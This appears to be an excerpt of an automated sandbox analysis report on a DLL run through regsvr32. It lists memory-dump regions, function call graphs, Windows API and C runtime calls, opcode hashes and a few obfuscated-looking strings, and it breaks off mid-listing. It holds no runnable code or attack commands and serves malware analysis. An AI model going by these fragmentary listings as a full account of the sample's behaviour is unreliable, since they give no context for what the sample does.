                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %'#$'1O"
                                                                    • API String ID: 0-3508158491
                                                                    • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                    • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                    • String ID:
                                                                    • API String ID: 994105223-0
                                                                    • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction ID: 73ead8789ef2f1ee3193b8ab5648861776a22f4fa9d1bf87aeaeeca8d9fc2257
                                                                    • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction Fuzzy Hash: 1A415C21E0935686EB64AB12AD6403E67F1BF98B90F542434DE8E87F74CE3CE591C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 187 7fff21bb2154-7fff21bb2160 188 7fff21bb21e1-7fff21bb21e3 187->188 189 7fff21bb2162-7fff21bb216b call 7fff21bb4110 187->189 191 7fff21bb221e-7fff21bb2221 188->191 192 7fff21bb21e5-7fff21bb21ed 188->192 196 7fff21bb216d-7fff21bb216f 189->196 199 7fff21bb2174-7fff21bb217b call 7fff21bb2fa0 189->199 193 7fff21bb2279-7fff21bb227c 191->193 194 7fff21bb2223-7fff21bb2232 call 7fff21bb2c88 call 7fff21bb3108 191->194 192->196 197 7fff21bb21f3-7fff21bb2201 192->197 203 7fff21bb227e-7fff21bb2280 call 7fff21bb2f50 193->203 204 7fff21bb2285 193->204 213 7fff21bb2237-7fff21bb223d 194->213 200 7fff21bb228a-7fff21bb228f 196->200 201 7fff21bb2208-7fff21bb220b 197->201 202 7fff21bb2203 call 7fff21bb36d0 197->202 214 7fff21bb217d-7fff21bb2182 call 7fff21bb415c 199->214 215 7fff21bb2184-7fff21bb21a9 call 7fff21bb40a0 GetCommandLineA call 7fff21bb3eec call 7fff21bb3758 199->215 201->204 209 7fff21bb220d-7fff21bb221c call 7fff21bb3a48 call 7fff21bb2c94 call 7fff21bb415c 201->209 202->201 203->204 204->200 209->204 213->196 217 7fff21bb2243-7fff21bb2257 FlsSetValue 213->217 214->196 236 7fff21bb21ab-7fff21bb21b0 call 7fff21bb2c94 215->236 237 7fff21bb21b2-7fff21bb21b9 call 7fff21bb3df4 215->237 221 7fff21bb2259-7fff21bb226d call 7fff21bb2cbc GetCurrentThreadId 217->221 222 7fff21bb226f-7fff21bb2274 call 7fff21bb3024 217->222 221->204 222->196 236->214 242 7fff21bb21da-7fff21bb21df call 7fff21bb3a48 237->242 243 7fff21bb21bb-7fff21bb21c2 call 7fff21bb3aec 237->243 242->236 243->242 248 7fff21bb21c4-7fff21bb21c6 call 7fff21bb347c 243->248 250 7fff21bb21cb-7fff21bb21cd 248->250 250->242 251 7fff21bb21cf-7fff21bb21d5 250->251 251->204
                                                                    APIs
                                                                      • Part of subcall function 00007FFF21BB4110: HeapCreate.KERNELBASE(?,?,?,?,00007FFF21BB2169), ref: 00007FFF21BB4122
                                                                      • Part of subcall function 00007FFF21BB4110: HeapSetInformation.KERNEL32 ref: 00007FFF21BB414C
                                                                    • _RTC_Initialize.LIBCMT ref: 00007FFF21BB2184
                                                                    • GetCommandLineA.KERNEL32 ref: 00007FFF21BB2189
                                                                      • Part of subcall function 00007FFF21BB3EEC: GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFF21BB219B), ref: 00007FFF21BB3F1B
                                                                      • Part of subcall function 00007FFF21BB3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFF21BB219B), ref: 00007FFF21BB3F5B
                                                                      • Part of subcall function 00007FFF21BB3758: GetStartupInfoA.KERNEL32 ref: 00007FFF21BB377D
                                                                    • __setargv.LIBCMT ref: 00007FFF21BB21B2
                                                                    • _cinit.LIBCMT ref: 00007FFF21BB21C6
                                                                      • Part of subcall function 00007FFF21BB2C94: FlsFree.KERNEL32(?,?,?,?,00007FFF21BB2217), ref: 00007FFF21BB2CA3
                                                                      • Part of subcall function 00007FFF21BB2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFF21BB2217), ref: 00007FFF21BB6A32
                                                                      • Part of subcall function 00007FFF21BB2C94: free.LIBCMT ref: 00007FFF21BB6A3B
                                                                      • Part of subcall function 00007FFF21BB2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFF21BB2217), ref: 00007FFF21BB6A5B
                                                                      • Part of subcall function 00007FFF21BB3108: Sleep.KERNEL32(?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB314D
                                                                    • FlsSetValue.KERNEL32 ref: 00007FFF21BB224C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FFF21BB2260
                                                                    • free.LIBCMT ref: 00007FFF21BB226F
                                                                      • Part of subcall function 00007FFF21BB3024: HeapFree.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB303A
                                                                      • Part of subcall function 00007FFF21BB3024: _errno.LIBCMT ref: 00007FFF21BB3044
                                                                      • Part of subcall function 00007FFF21BB3024: GetLastError.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB304C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                    • String ID:
                                                                    • API String ID: 1549890855-0
                                                                    • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction ID: 992076fb645f9cb69a7edd2f8008995ffd8d2fe5f43481c442013f9e4d17f47f
                                                                    • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction Fuzzy Hash: 3731C024E0D20346FB7567A29D222BE11F57F59750F1061B4DE1EC5AF2EE2CF640421A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FFF21BB4CF3
                                                                      • Part of subcall function 00007FFF21BB497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFF21BB4D0E,?,?,?,?,?,00007FFF21BB4EE3), ref: 00007FFF21BB49A6
                                                                      • Part of subcall function 00007FFF21BB309C: Sleep.KERNEL32(?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3,?,?,?,?,?,?,00000000,00007FFF21BB2DC8), ref: 00007FFF21BB30D2
                                                                    • free.LIBCMT ref: 00007FFF21BB4D7F
                                                                      • Part of subcall function 00007FFF21BB3024: HeapFree.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB303A
                                                                      • Part of subcall function 00007FFF21BB3024: _errno.LIBCMT ref: 00007FFF21BB3044
                                                                      • Part of subcall function 00007FFF21BB3024: GetLastError.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB304C
                                                                    • _lock.LIBCMT ref: 00007FFF21BB4DB7
                                                                    • free.LIBCMT ref: 00007FFF21BB4E67
                                                                    • free.LIBCMT ref: 00007FFF21BB4E97
                                                                    • _errno.LIBCMT ref: 00007FFF21BB4E9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                    • String ID:
                                                                    • API String ID: 1264244385-0
                                                                    • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction ID: 3c7ee8a9df6acadae2dde35f65b7d0b9d2fca3553326f6b1b70c652872af0335
                                                                    • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction Fuzzy Hash: FE51AC21D08A4286E7649B25AC6027DB7F1FF94B54F146236DA5E83BB5CF3CEA05C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 502529563-0
                                                                    • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction ID: 21ecbc1d259896a404e0de222cf8d729961601b5a98e0f195ae2fca719304c7f
                                                                    • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction Fuzzy Hash: E1111F25E1964285FB646B72EC2127D22F0FF84B90F046131ED1DC6FE6DE6CE9408759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                    • String ID: vb4vcW2kAW3Twaz?30
                                                                    • API String ID: 254689257-4179232793
                                                                    • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction ID: b639f804a2aad9284c5c74ec30d6caf79157f3156cae416e7fdfca029c2062f1
                                                                    • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction Fuzzy Hash: C2210732A0DE828AE730CB14E8543AA77F9FB88744F405535CACD87B65DF7DA6018B08
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FFF21BB36F0: _initp_misc_winsig.LIBCMT ref: 00007FFF21BB3729
                                                                      • Part of subcall function 00007FFF21BB36F0: EncodePointer.KERNEL32(?,?,?,00007FFF21BB2FAB,?,?,?,00007FFF21BB2179), ref: 00007FFF21BB3745
                                                                    • FlsAlloc.KERNEL32(?,?,?,00007FFF21BB2179), ref: 00007FFF21BB2FBB
                                                                      • Part of subcall function 00007FFF21BB3108: Sleep.KERNEL32(?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFF21BB2179), ref: 00007FFF21BB2FEC
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FFF21BB3000
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 54287522-0
                                                                    • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction ID: 9b7684a6bd8a086bd4852b97d18d162fb750039e7a6564433e895ac852057931
                                                                    • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction Fuzzy Hash: 9C016220E0990345FB34AB719C6527E22F17F08720F442234DD2DC66F1EF2CB685D269
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: :}
                                                                    • API String ID: 963392458-2902022129
                                                                    • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                    • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID: JKvDDasqwOPvGXZdqW
                                                                    • API String ID: 621844428-4059861069
                                                                    • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction ID: 3005d8ff707ac7d06b1a1675a895459ffcd54ab2ee9c88dfddc59c85fbf9e913
                                                                    • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction Fuzzy Hash: 09D09222E19A8282DB20AB11EC1539E63F4FB89348F801230D5CC86638DF7CD25ACB08
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _errno.LIBCMT ref: 00007FFF21BB6D0F
                                                                      • Part of subcall function 00007FFF21BB66D8: DecodePointer.KERNEL32 ref: 00007FFF21BB66FF
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFF21BB313B,?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF), ref: 00007FFF21BB6D58
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateDecodeHeapPointer_errno
                                                                    • String ID:
                                                                    • API String ID: 15861996-0
                                                                    • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction ID: 88970badedbf16b72f45fbce3722c588b6d4c2490853938a4e6e7d5e9e896883
                                                                    • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction Fuzzy Hash: C411C825F0914246FB245F35EE2437D62F1BF407D4F046934CE1D87EE4DE6CAA804648
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _initp_misc_winsig.LIBCMT ref: 00007FFF21BB3729
                                                                      • Part of subcall function 00007FFF21BB755C: EncodePointer.KERNEL32(?,?,?,?,00007FFF21BB373E,?,?,?,00007FFF21BB2FAB,?,?,?,00007FFF21BB2179), ref: 00007FFF21BB7567
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FFF21BB2FAB,?,?,?,00007FFF21BB2179), ref: 00007FFF21BB3745
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer$_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 190222155-0
                                                                    • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction ID: 9fdf3c5115cc0caa00dbf05d078f7b8c2f2248f52f6be64096d4d0934211bfc4
                                                                    • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction Fuzzy Hash: 62F01F00E8964744EA29BB626C725BC12A46F96B80B883070AC1F9AFF3DD2CE6554758
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CreateInformation
                                                                    • String ID:
                                                                    • API String ID: 1774340351-0
                                                                    • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction ID: f69c12c82018d1cfc2fb1953185c0f787333fa733c941ea381585bb13fd020f3
                                                                    • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction Fuzzy Hash: 88E0D874F1674147E7589B12DC0976922A0FB88740F406039DA4E42B64DF3CC0458A00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FFF21BB34AF,?,?,?,00007FFF21BB21CB), ref: 00007FFF21BB740D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction ID: d9a7592d79838c289d4993485e9edba06a0fd2ab8d051b7ffd158b311d45e8db
                                                                    • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction Fuzzy Hash: 13D05B32F5854191DB208B61F99116D23F4FB84794F589031DA5C47B55DD3CD556C704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,0000000A,00007FFF21BB2DA3,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB314D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction ID: bde814ce2ac7620d14331c99935594c799e40e01276ce221dcb89bdb8c60d82c
                                                                    • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction Fuzzy Hash: 46016222E25B8186EB549B169C5002EB6F5FB98FD0F092131DE5D87F61DF38E991C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00007FFF21BB6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFF21BB6C64
                                                                      • Part of subcall function 00007FFF21BB6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFF21BB30C0,?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3), ref: 00007FFF21BB6C89
                                                                      • Part of subcall function 00007FFF21BB6C34: _errno.LIBCMT ref: 00007FFF21BB6CAD
                                                                      • Part of subcall function 00007FFF21BB6C34: _errno.LIBCMT ref: 00007FFF21BB6CB8
